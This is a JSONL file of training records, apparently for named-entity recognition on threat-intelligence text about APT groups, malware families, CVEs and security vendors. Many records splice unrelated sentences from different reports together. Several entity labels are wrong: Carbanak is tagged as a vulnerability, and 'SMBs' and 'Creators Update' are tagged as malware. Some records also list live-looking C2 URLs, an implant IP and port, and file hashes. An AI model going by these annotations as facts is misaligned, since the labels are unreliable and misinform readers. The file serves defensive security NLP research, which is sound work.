{"text": "Similar to HummingBad , the malware also fakes device identification information , such as IMEI and IMSI , to download an app twice while seeming like the installation is happening on a different device , thereby doubling the potential revenue . Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People . We have to validate if a global variable with above-mentioned conditions is assigned to the register . While a sudden dip in attacks is n't too unusual for top ransomware gangs , it 's worth mentioning that in last month ’s review we speculated that Royal might be going through a rebrand .", "spans": {"MALWARE: HummingBad": [[11, 21]], "ORGANIZATION: Secureworks®": [[246, 258]], "ORGANIZATION: CTU": [[306, 309]], "THREAT_ACTOR: BRONZE BUTLER": [[368, 381]], "THREAT_ACTOR: Tick": [[398, 402]], "THREAT_ACTOR: threat group": [[405, 417]], "THREAT_ACTOR: Royal": [[710, 715]]}, "info": {"id": "cyberner_stix_train_006018", "source": "cyberner_stix_train"}}
{"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": {"VULNERABILITY: Carbanak": [[118, 126]], "ORGANIZATION: consumer": [[194, 202]], "TOOL: Carberp": [[294, 301]]}, "info": {"id": "cyberner_stix_train_006019", "source": "cyberner_stix_train"}}
{"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . WannaCry utilizes EternalBlue by crafting a custom SMB session request with hard-coded values based on the target system .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: sample": [[36, 42]], "THREAT_ACTOR: OceanLotus": [[52, 62]], "MALWARE: WannaCry": [[108, 116]], "VULNERABILITY: EternalBlue": [[126, 137]], "MALWARE: SMB": [[159, 162]]}, "info": {"id": "cyberner_stix_train_006020", "source": "cyberner_stix_train"}}
{"text": "Additional collection of related documents revealed a second first-stage payload that we have named ‘ Cannon ’ .", "spans": {"MALWARE: Cannon": [[102, 108]]}, "info": {"id": "cyberner_stix_train_006021", "source": "cyberner_stix_train"}}
{"text": "Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group .", "spans": {"TOOL: UEFI": [[42, 46]], "MALWARE: LoJax": [[64, 69]], "THREAT_ACTOR: Sednit": [[98, 104]]}, "info": {"id": "cyberner_stix_train_006022", "source": "cyberner_stix_train"}}
{"text": "jhfrte.jar : This is a java archive file downloaded from server . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": {"TOOL: Word": [[98, 102]], "THREAT_ACTOR: PLATINUM": [[105, 113]], "VULNERABILITY: CVE-2015-2545": [[219, 232]], "THREAT_ACTOR: attacker": [[266, 274]], "THREAT_ACTOR: APT10": [[348, 353]], "THREAT_ACTOR: MenuPass Group": [[356, 370]], "ORGANIZATION: FireEye": [[413, 420]]}, "info": {"id": "cyberner_stix_train_006023", "source": "cyberner_stix_train"}}
{"text": "The Trojan is distributed in Russia and CIS countries . VENOMOUS BEAR is an advanced , Russia-based adversary that's been active since at least 2004 . The analysts involved were able to identify command and control ( C2 ) servers , dropper and installation methods , means of persistence , and identify the attack tools that are core to the RAT ’s purpose . The VPNs used by RGB actors occasionally fail , which reveals the IP addresses of the actor 's true origins .", "spans": {"THREAT_ACTOR: VENOMOUS BEAR": [[56, 69]], "TOOL: command and control": [[195, 214]], "TOOL: C2": [[217, 219]], "TOOL: RAT": [[341, 344]], "SYSTEM: The VPNs": [[358, 366]], "THREAT_ACTOR: RGB actors": [[375, 385]], "SYSTEM: the IP addresses": [[420, 436]]}, "info": {"id": "cyberner_stix_train_006024", "source": "cyberner_stix_train"}}
{"text": "Carbanak is also aware of the IFOBS banking application and can , on command , substitute the details of payment documents in the IFOBS system . Our analysis indicates this is a sophisticated multi-stage infection ; which begins with Epic Turla .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "MALWARE: Epic Turla": [[234, 244]]}, "info": {"id": "cyberner_stix_train_006025", "source": "cyberner_stix_train"}}
{"text": "A majority of malware that perform this persistence technique modify the necessary registry keys in ways that do not fit the profile of a legitimate program .", "spans": {}, "info": {"id": "cyberner_stix_train_006026", "source": "cyberner_stix_train"}}
{"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Turla merely uses the Adobe brand to trick users into downloading the malware .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "THREAT_ACTOR: Turla": [[186, 191]]}, "info": {"id": "cyberner_stix_train_006027", "source": "cyberner_stix_train"}}
{"text": "The actors attempted to exploit CVE-2014-6332 using a slightly modified version of the proof-of-concept ( POC ) code to install a Trojan called Emissary , which is related to the Operation Lotus Blossom campaign . What actually happens is that the malware is able to decode data from the PDF documents and interpret it as commands for the backdoor .", "spans": {"THREAT_ACTOR: actors": [[4, 10]], "VULNERABILITY: CVE-2014-6332": [[32, 45]], "TOOL: Emissary": [[144, 152]], "MALWARE: PDF documents": [[288, 301]]}, "info": {"id": "cyberner_stix_train_006028", "source": "cyberner_stix_train"}}
{"text": "Several hardcoded applications targeted by the MDM-grabbing command ‘ wifi ’ – this command creates a new Wi-Fi connection with specified configurations from the command and enable Wi-Fi if it is disabled . In other schemes , NewsBeef sent macro-enabled Office attachments from spoofed law firm identities or other relevant service providers to targets in SA . While Naikon shares some characteristics with APT30 , the two groups do not appear to be exact matches .", "spans": {"THREAT_ACTOR: NewsBeef": [[226, 234]], "THREAT_ACTOR: Naikon": [[367, 373]], "THREAT_ACTOR: APT30": [[407, 412]]}, "info": {"id": "cyberner_stix_train_006029", "source": "cyberner_stix_train"}}
{"text": "We believe the Lazarus group ’s continuous attacks for financial gain are unlikely to stop anytime soon .", "spans": {"THREAT_ACTOR: Lazarus": [[15, 22]]}, "info": {"id": "cyberner_stix_train_006030", "source": "cyberner_stix_train"}}
{"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate .", "spans": {"VULNERABILITY: CVE-2019-0752": [[25, 38]], "ORGANIZATION: Trend Micro’s": [[90, 103]], "MALWARE: sub-domains": [[195, 206]], "VULNERABILITY: exploit": [[214, 221]]}, "info": {"id": "cyberner_stix_train_006031", "source": "cyberner_stix_train"}}
{"text": "We present as much public information as possible to support this assessment , but withheld sensitive information that further contributes to our high confidence assessment .", "spans": {}, "info": {"id": "cyberner_stix_train_006032", "source": "cyberner_stix_train"}}
{"text": "Guccifer 2.0 continued to leak batches of DNC documents through September .", "spans": {"THREAT_ACTOR: Guccifer": [[0, 8]], "ORGANIZATION: DNC": [[42, 45]]}, "info": {"id": "cyberner_stix_train_006033", "source": "cyberner_stix_train"}}
{"text": "This includes testing multiple versions of malicious software , some of which were used by TEMP.Veles during the TRITON intrusion .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[91, 101]], "MALWARE: TRITON": [[113, 119]]}, "info": {"id": "cyberner_stix_train_006034", "source": "cyberner_stix_train"}}
{"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers . The vulnerability exists in the old Equation Editor ( EQNEDT32.EXE ) , a component of Microsoft Office that is used to insert and evaluate mathematical formulas .", "spans": {"MALWARE: Backdoor": [[0, 8]], "MALWARE: Equation Editor": [[150, 165]], "FILEPATH: EQNEDT32.EXE": [[168, 180]], "ORGANIZATION: Microsoft": [[200, 209]]}, "info": {"id": "cyberner_stix_train_006035", "source": "cyberner_stix_train"}}
{"text": "Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"MALWARE: Ploutus-D": [[6, 15], [88, 97]], "ORGANIZATION: ATM vendors": [[139, 150]], "MALWARE: SMBs": [[231, 235]], "ORGANIZATION: accountants": [[273, 284]]}, "info": {"id": "cyberner_stix_train_006036", "source": "cyberner_stix_train"}}
{"text": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes , including monitoring open-source coverage of TRITON , network reconnaissance , and malicious activity in support of the TRITON intrusion .", "spans": {"ORGANIZATION: CNIIHM": [[28, 34]], "THREAT_ACTOR: TEMP.Veles": [[56, 66]], "MALWARE: TRITON": [[136, 142], [211, 217]]}, "info": {"id": "cyberner_stix_train_006037", "source": "cyberner_stix_train"}}
{"text": "All archives from this phase contain the same files except for one called “ common ” . Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . The majority of the victims are associated with the hospitality sector . As a consequence , four trams were derailed and twelve people injured due to resulting emergency stops .", "spans": {"ORGANIZATION: Lookout": [[87, 94]], "TOOL: FrozenCell": [[162, 172]]}, "info": {"id": "cyberner_stix_train_006038", "source": "cyberner_stix_train"}}
{"text": "They could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": {"MALWARE: CosmicDuke": [[34, 44]]}, "info": {"id": "cyberner_stix_train_006039", "source": "cyberner_stix_train"}}
{"text": "Thanks to Allwinner , a Chinese ARM system-on-a-chip maker , which has recently been caught shipping a version of Linux Kernel with an incredibly simple and easy-to-use built-in backdoor . The threat actors appear to be able to create and leverage multiple SWCs in parallel . Outlaw : 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79 Cryptocurrency miner Coinminer.Linux.MALXMR.SMDSL64 . The series also touches on shocking new details unearthed by KrebsOnSecurity and Jeremy Bullock , a data scientist who worked with the show ’s producers at the Warner Bros. production company Wall to Wall Media .", "spans": {"ORGANIZATION: Allwinner": [[10, 19]], "SYSTEM: ARM": [[32, 35]], "SYSTEM: Linux": [[114, 119]], "TOOL: SWCs": [[257, 261]], "THREAT_ACTOR: Outlaw": [[276, 282]], "FILEPATH: 649280bd4c5168009c1cff30e5e1628bcf300122b49d339e3ea3f3b6ff8f9a79": [[285, 349]], "TOOL: Cryptocurrency miner": [[350, 370]], "MALWARE: Coinminer.Linux.MALXMR.SMDSL64": [[371, 401]], "ORGANIZATION: KrebsOnSecurity": [[465, 480]], "ORGANIZATION: Jeremy Bullock": [[485, 499]], "ORGANIZATION: Warner Bros. production company Wall to Wall Media": [[564, 614]]}, "info": {"id": "cyberner_stix_train_006040", "source": "cyberner_stix_train"}}
{"text": "You can find a full list of targeted models in the Appendix . Maudi Surveillance Operation which was previously reported in 2013 . Sowbug is a threat group that has conducted targeted attacks against organizations in South America and Southeast Asia , particularly government entities , since at least 2015 .", "spans": {"THREAT_ACTOR: Maudi": [[62, 67]], "THREAT_ACTOR: Sowbug": [[131, 137]], "ORGANIZATION: government entities": [[265, 284]]}, "info": {"id": "cyberner_stix_train_006041", "source": "cyberner_stix_train"}}
{"text": "Of these campaigns , two clusters in particular stand out .", "spans": {}, "info": {"id": "cyberner_stix_train_006042", "source": "cyberner_stix_train"}}
{"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan . The group has been active since at least January 2013 .", "spans": {"VULNERABILITY: CVE-2012-0158": [[66, 79]], "TOOL: NetTraveler Trojan": [[95, 113]]}, "info": {"id": "cyberner_stix_train_006043", "source": "cyberner_stix_train"}}
{"text": "Upon kill chain completion , “ Agent Smith ” will then hijack compromised user apps to show ads . Unit 42 analyzed the systems communicating with the Bookworm C2 domains and found that a majority of the IP addresses existed within autonomous systems ( ASN ) located in Thailand . While Microsoft Defender Advanced Threat Protection ’s pre-execution detection engines blocked Dexphot in most cases , behavior-based machine learning models provided protection for cases where the threat slipped through . Enterprise T1482 Domain Trust Discovery During the SolarWinds Compromise , APT29 used the Get - AcceptedDomain PowerShell cmdlet to enumerate accepted domains through an Exchange Management Shell .", "spans": {"MALWARE: Agent Smith": [[31, 42]], "ORGANIZATION: Unit 42": [[98, 105]], "TOOL: Bookworm": [[150, 158]], "TOOL: Microsoft Defender Advanced Threat Protection": [[286, 331]], "MALWARE: Dexphot": [[375, 382]], "THREAT_ACTOR: the SolarWinds Compromise": [[550, 575]], "THREAT_ACTOR: APT29": [[578, 583]]}, "info": {"id": "cyberner_stix_train_006044", "source": "cyberner_stix_train"}}
{"text": "Google later implemented platform-level changes that practically eliminated this attack surface . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor . “ HexRaysDeob ” The script downloads two files to locations defined by the variables ffn and fn , but only the first file is executed via the system function .", "spans": {"ORGANIZATION: Google": [[0, 6]], "ORGANIZATION: Advanced Threat Research": [[114, 138]], "TOOL: SYSCON backdoor": [[190, 205]], "TOOL: HexRaysDeob": [[210, 221]]}, "info": {"id": "cyberner_stix_train_006045", "source": "cyberner_stix_train"}}
{"text": "To that end , it is very unlikely that the United States government or Shell , a global energy company , would commission SilverTerrier actors to develop domains that impersonate their own legitimate websites and services . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year .", "spans": {"ORGANIZATION: government": [[57, 67]], "ORGANIZATION: global energy company": [[81, 102]], "THREAT_ACTOR: SilverTerrier actors": [[122, 142]], "THREAT_ACTOR: Turla": [[231, 236]], "TOOL: emails": [[305, 311]], "ORGANIZATION: German Foreign Office staff": [[324, 351]]}, "info": {"id": "cyberner_stix_train_006046", "source": "cyberner_stix_train"}}
{"text": "To mitigate the threat described in this report , iDefense recommends blocking access to the IP address and URI pattern :", "spans": {"ORGANIZATION: iDefense": [[50, 58]]}, "info": {"id": "cyberner_stix_train_006047", "source": "cyberner_stix_train"}}
{"text": "Original password The main service follows the same structure as the first version , the anti-analysis features are primitive , only checking the emulator environment without any kind of packing or obfuscation . We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples . Although there are no current infrastructure ties to link this backdoor to APT12 , there are several data points that show a possible tie to the same actors : During the SolarWinds Compromise , APT29 gained access through compromised accounts at cloud solution partners , and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems .", "spans": {"TOOL: MoonWind": [[232, 240]], "THREAT_ACTOR: APT12": [[428, 433]], "THREAT_ACTOR: the SolarWinds Compromise": [[519, 544]], "THREAT_ACTOR: APT29": [[547, 552]]}, "info": {"id": "cyberner_stix_train_006048", "source": "cyberner_stix_train"}}
{"text": "Android.Oldboot acts as a system service and connects to the command-and-controller server using libgooglekernel.so library and receives commands to download , remove installed apps , and install malicious apps . Both attackers and victims speak Spanish natively , as we see it consistently in the source code of the client side and in the Python code . APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously . Then , it copies the system file “ rundll32.exe ” to the same directory with name “ ntuser.exe ” and runs it with “ ntuser.bin ” as a parameter , effectively loading the malicious DLL file .", "spans": {"MALWARE: Android.Oldboot": [[0, 15]], "THREAT_ACTOR: APT1": [[354, 358]], "MALWARE: the malicious DLL file": [[717, 739]]}, "info": {"id": "cyberner_stix_train_006049", "source": "cyberner_stix_train"}}
{"text": "In one instance the DDE attack was used to deliver and install Zebrocy .", "spans": {"MALWARE: Zebrocy": [[63, 70]]}, "info": {"id": "cyberner_stix_train_006050", "source": "cyberner_stix_train"}}
{"text": "] xyzdebra-morgan [ . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . However , it does mean that the intruders need to be able to interface with the ( often graphical ) C2 server software running on the hop . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": {"MALWARE: Microsoft PowerPoint file": [[43, 68]], "MALWARE: thanks.pps": [[77, 87]], "MALWARE: Microsoft Word document": [[119, 142]], "MALWARE: request.docx": [[151, 163]], "TOOL: C2": [[268, 270]], "THREAT_ACTOR: advanced , convincing phishing attacks": [[539, 577]]}, "info": {"id": "cyberner_stix_train_006051", "source": "cyberner_stix_train"}}
{"text": "http://188.241.58.170/local/s3/filters.php https://200.122.181.25/catalog/products/books.php .", "spans": {"URL: http://188.241.58.170/local/s3/filters.php": [[0, 42]], "URL: https://200.122.181.25/catalog/products/books.php": [[43, 92]]}, "info": {"id": "cyberner_stix_train_006052", "source": "cyberner_stix_train"}}
{"text": "The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": {"ORGANIZATION: CTU": [[45, 48]]}, "info": {"id": "cyberner_stix_train_006053", "source": "cyberner_stix_train"}}
{"text": "By the time of this publication , two Jaguar Kill Switch infected app has reached 10 million downloads while others are still in their early stages . The interest among hackers in targeting trading systems is expected to grow . PaloAlto has already written about one of them . Other Snort rules and detection content can prevent the execution of the malware used as the final payload .", "spans": {"ORGANIZATION: PaloAlto": [[228, 236]]}, "info": {"id": "cyberner_stix_train_006054", "source": "cyberner_stix_train"}}
{"text": "Brexit 15.11.2018.docx :", "spans": {"FILEPATH: Brexit 15.11.2018.docx": [[0, 22]]}, "info": {"id": "cyberner_stix_train_006055", "source": "cyberner_stix_train"}}
{"text": "It opens a socket on the victim ’ s machine and connects with a server-side component of the implant located at 54.67.109.199:6500 . Both in the attacks against ITUC and in other occasions , Operation Kingphish approached selected targets over social media , prominently Facebook , and engaged in chat conversations with them on and off , sometimes over a period of several months . The group uses a Trojan by the same name ( RTM ) .", "spans": {"ORGANIZATION: ITUC": [[161, 165]], "THREAT_ACTOR: Operation Kingphish": [[191, 210]], "TOOL: social media": [[244, 256]], "TOOL: prominently Facebook": [[259, 279]], "MALWARE: Trojan": [[400, 406]], "THREAT_ACTOR: RTM": [[426, 429]]}, "info": {"id": "cyberner_stix_train_006056", "source": "cyberner_stix_train"}}
{"text": "Therefore , our team managed to generate the public key and craft an SMS message that activated the kill switch . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows .", "spans": {"THREAT_ACTOR: attackers": [[174, 183]], "VULNERABILITY: exploit": [[319, 326]], "TOOL: Microsoft Windows OLE Remote Code Execution": [[335, 378]], "VULNERABILITY: CVE-2014-6332": [[395, 408]], "ORGANIZATION: Microsoft": [[448, 457]], "SYSTEM: Windows": [[458, 465]]}, "info": {"id": "cyberner_stix_train_006057", "source": "cyberner_stix_train"}}
{"text": "Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image . The group has demonstrated access to zero-day vulnerabilities CVE-2018-0802 , and the ability to incorporate them into operations .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: dropper": [[43, 50]], "MALWARE: malicious.exe": [[68, 81]], "MALWARE: .dll file": [[85, 94]], "VULNERABILITY: zero-day": [[175, 183]], "VULNERABILITY: CVE-2018-0802": [[200, 213]]}, "info": {"id": "cyberner_stix_train_006058", "source": "cyberner_stix_train"}}
{"text": "The frozen TinyML model is useful for making sure images fit the screen without distortion . August 2013 , FireEye gained visibility on one of 22 CnC servers used at that time by the Ke3chang attackers . The summary of the modifications is : What the team uncovered was that the former MiniDuke attackers were still active , and using extremely effective social engineering techniques involving sending malicious PDF documents to compromise their victims .", "spans": {"SYSTEM: TinyML": [[11, 17]], "ORGANIZATION: FireEye": [[107, 114]], "THREAT_ACTOR: Ke3chang": [[183, 191]], "THREAT_ACTOR: attackers": [[192, 201]], "THREAT_ACTOR: the former MiniDuke attackers": [[275, 304]]}, "info": {"id": "cyberner_stix_train_006059", "source": "cyberner_stix_train"}}
{"text": "The only purpose of this method is to connect to the C & C server . As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection . IRONHALO : CVE-2015-1701 . This dangerous malware was developed to exploit weaknesses in those systems and the communication protocols they use – systems developed decades ago with almost no security measures .", "spans": {"MALWARE: IRONHALO": [[225, 233]], "VULNERABILITY: CVE-2015-1701": [[236, 249]]}, "info": {"id": "cyberner_stix_train_006060", "source": "cyberner_stix_train"}}
{"text": "If it finds apps on its prey list ( hard-coded or sent from C & C server ) , it will extract the base APK of the target innocent app on the device , patch the APK with malicious ads modules , install the APK back and replace the original one as if it is an update . Chitpas is heavily involved with Thailand politics and was a core leader of the People's Committee for Absolute Democracy ( PCAD ) , which is an organization that staged anti-government campaigns in 2013 and 2014 . It hijacked legitimate system processes to disguise malicious activity . Cloud Administration Command APT29 has used Azure Run Command and Azure Admin - on - Behalf - of ( AOBO ) to execute code on virtual machines .", "spans": {"ORGANIZATION: politics": [[308, 316]], "THREAT_ACTOR: Cloud Administration Command APT29": [[554, 588]], "SYSTEM: Azure Run Command": [[598, 615]], "SYSTEM: Azure Admin - on - Behalf - of ( AOBO )": [[620, 659]]}, "info": {"id": "cyberner_stix_train_006062", "source": "cyberner_stix_train"}}
{"text": "We believe all three circumstances to have coexisted at least to some extent .", "spans": {}, "info": {"id": "cyberner_stix_train_006063", "source": "cyberner_stix_train"}}
{"text": "During the timeline of this cyber attack most of these IP addresses were located in Pakistan and few IP addresses used the hosting provider infrastructure .", "spans": {"TOOL: hosting provider infrastructure": [[123, 154]]}, "info": {"id": "cyberner_stix_train_006064", "source": "cyberner_stix_train"}}
{"text": "Red Alert Plays Dress-Up In the wild , we found Web pages designed to ( vaguely ) resemble legitimate app market pages , hosting files for download that have been disguised as a legitimate mobile application of moderately broad appeal , such as a media player or social media app . We believe a organization located in Middle East was targeted by APT37 because it had been involved with a North Korean company and a business deal went bad . If the mouse hooking function registers a button hit, it lets the screenshotting thread know about it through a global . KillNet previously claimed various links to REvil and Conti , which we were unable to verify , including :", "spans": {"MALWARE: Red Alert": [[0, 9]], "THREAT_ACTOR: APT37": [[347, 352]], "ORGANIZATION: company": [[402, 409]], "THREAT_ACTOR: REvil": [[606, 611]], "THREAT_ACTOR: Conti": [[616, 621]]}, "info": {"id": "cyberner_stix_train_006065", "source": "cyberner_stix_train"}}
{"text": "Health_insurance_plan.doc : ecfc0275c7a73a9c7775130ebca45b74 .", "spans": {"FILEPATH: Health_insurance_plan.doc": [[0, 25]], "FILEPATH: ecfc0275c7a73a9c7775130ebca45b74": [[28, 60]]}, "info": {"id": "cyberner_stix_train_006066", "source": "cyberner_stix_train"}}
{"text": "] net svc [ . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco . So when a larger , successful threat actor changes up tactics , the move always piques our attention . In addition to SocGholish , the Domen toolkit was a well - built framework that emerged in 2019 while another campaign known as sczriptzzbn dropped SolarMarker leading to the NetSupport RAT in both cases .", "spans": {"TOOL: KeyBoy": [[78, 84]], "ORGANIZATION: Cisco": [[108, 113]], "MALWARE: Domen toolkit": [[251, 264]], "TOOL: SolarMarker": [[367, 378]], "MALWARE: NetSupport RAT": [[394, 408]]}, "info": {"id": "cyberner_stix_train_006067", "source": "cyberner_stix_train"}}
{"text": "As the latest revision of the backdoor , portions of SPLM didn’t match previous reports on SPLM / XAgent while other similarities were maintained .", "spans": {"MALWARE: SPLM": [[53, 57], [91, 95]], "MALWARE: XAgent": [[98, 104]]}, "info": {"id": "cyberner_stix_train_006068", "source": "cyberner_stix_train"}}
{"text": "Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software , retrofitted with code used for command and control .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]], "ORGANIZATION: Mandiant": [[70, 78]]}, "info": {"id": "cyberner_stix_train_006069", "source": "cyberner_stix_train"}}
{"text": "Though different versions of the app vary in structure , malicious code was initialized at application launch without the user ’ s knowledge , and a number of timers were setup to gather and upload data periodically . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[232, 251]], "VULNERABILITY: spearphish exploits": [[278, 297]], "ORGANIZATION: Talos": [[356, 361]], "THREAT_ACTOR: threat actor MuddyWater": [[467, 490]]}, "info": {"id": "cyberner_stix_train_006070", "source": "cyberner_stix_train"}}
{"text": "Quasar version 1.1.0.0 names the encryption module name space “ Encryption ” , while subsequent Quasar versions use “ Cryptography ” – which we observe in this sample .", "spans": {"MALWARE: Quasar version 1.1.0.0": [[0, 22]], "MALWARE: Quasar versions": [[96, 111]]}, "info": {"id": "cyberner_stix_train_006071", "source": "cyberner_stix_train"}}
{"text": "It turns out , however , that other security researchers noticed suspicious and faulty code on BLU devices as early as March 2015 , and it has taken nearly that long to remove it from the company 's devices . The attacker gained access to the victim’s internet-accessible Citrix systems and authenticated to them from networks associated with low-cost VPN providers owned by VPN Consumer Network . While some of the group ’s tools , tactics , and procedures ( TTPs ) have been covered within this article , it is likely there is much that still remains uncovered .", "spans": {"ORGANIZATION: BLU": [[95, 98]], "THREAT_ACTOR: attacker": [[213, 221]], "TOOL: Citrix": [[272, 278]]}, "info": {"id": "cyberner_stix_train_006072", "source": "cyberner_stix_train"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.249 [ . In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . menuPass is an ongoing APT campaign with a broad range of targets and will likely continue to target Japan in the future .", "spans": {"MALWARE: BalkanDoor": [[86, 96]], "VULNERABILITY: CVE-2018-20250": [[281, 295]]}, "info": {"id": "cyberner_stix_train_006073", "source": "cyberner_stix_train"}}
{"text": "The U.S. Democratic party's governing body , the Democratic National Committee ( DNC ) , uses the dnc.org domain for its staff email .", "spans": {"ORGANIZATION: Democratic National Committee": [[49, 78]], "ORGANIZATION: DNC": [[81, 84]], "DOMAIN: dnc.org": [[98, 105]], "TOOL: email": [[127, 132]]}, "info": {"id": "cyberner_stix_train_006074", "source": "cyberner_stix_train"}}
{"text": "As their infection vectors , these campaigns used malicious documents exploiting recently fixed vulnerabilities .", "spans": {}, "info": {"id": "cyberner_stix_train_006075", "source": "cyberner_stix_train"}}
{"text": "The attacker can issue commands ( not all commands appear in different samples ) through the Quasar server GUI for each client :", "spans": {"TOOL: Quasar server GUI": [[93, 110]]}, "info": {"id": "cyberner_stix_train_006076", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Today , this malware is still actively being used against the Philippines .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: malware": [[222, 229]]}, "info": {"id": "cyberner_stix_train_006077", "source": "cyberner_stix_train"}}
{"text": "If the actor wishes to download an additional payload to the compromised host , they will respond by sending emails in the following steps .", "spans": {"TOOL: emails": [[109, 115]]}, "info": {"id": "cyberner_stix_train_006078", "source": "cyberner_stix_train"}}
{"text": "As this approach was not a great success , their last attempt was to quickly create a World Cup app and this time distribute it to Israeli citizens , not just soldiers . POSHSPY is an excellent example of the skill and craftiness of APT29 . Once executed the Ursnif sample will conduct the typical actions observed in Ursnif samples , like credential harvesting , gathering system and process information , and deploying additional malware samples . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": {"TOOL: POSHSPY": [[170, 177]], "THREAT_ACTOR: APT29": [[233, 238]], "MALWARE: Ursnif": [[259, 265], [318, 324]], "THREAT_ACTOR: LockBit": [[496, 503]], "THREAT_ACTOR: Royal ransomware gang": [[527, 548]], "TOOL: new encryptor": [[563, 576]], "ORGANIZATION: Manufacturing sector": [[620, 640]]}, "info": {"id": "cyberner_stix_train_006079", "source": "cyberner_stix_train"}}
{"text": "Given the level of overlap already , I proceeded to grab all of the passive DNS available for each of the 707 IP addresses .", "spans": {}, "info": {"id": "cyberner_stix_train_006080", "source": "cyberner_stix_train"}}
{"text": "To date , all observed Snake Wine 's attacks were the result of spear phishing attempts against the victim organizations . And , finally , with the upcoming Creators Update , Windows Defender ATP will provide additional capabilities for detecting threats such as Winnti , as well as centralized response options , such as machine isolation and file blocking , that will enable fast containment of known attack jump off points .", "spans": {"THREAT_ACTOR: Snake Wine": [[23, 33]], "MALWARE: Creators Update": [[157, 172]], "ORGANIZATION: Windows Defender ATP": [[175, 195]], "MALWARE: Winnti": [[263, 269]]}, "info": {"id": "cyberner_stix_train_006081", "source": "cyberner_stix_train"}}
{"text": "Another similarity is that Suckfly stole a certificate from Company D ( see Figure 4 ) less than two years after Blackfly had stolen a certificate from the same company .", "spans": {"THREAT_ACTOR: Suckfly": [[27, 34]], "THREAT_ACTOR: Blackfly": [[113, 121]]}, "info": {"id": "cyberner_stix_train_006082", "source": "cyberner_stix_train"}}
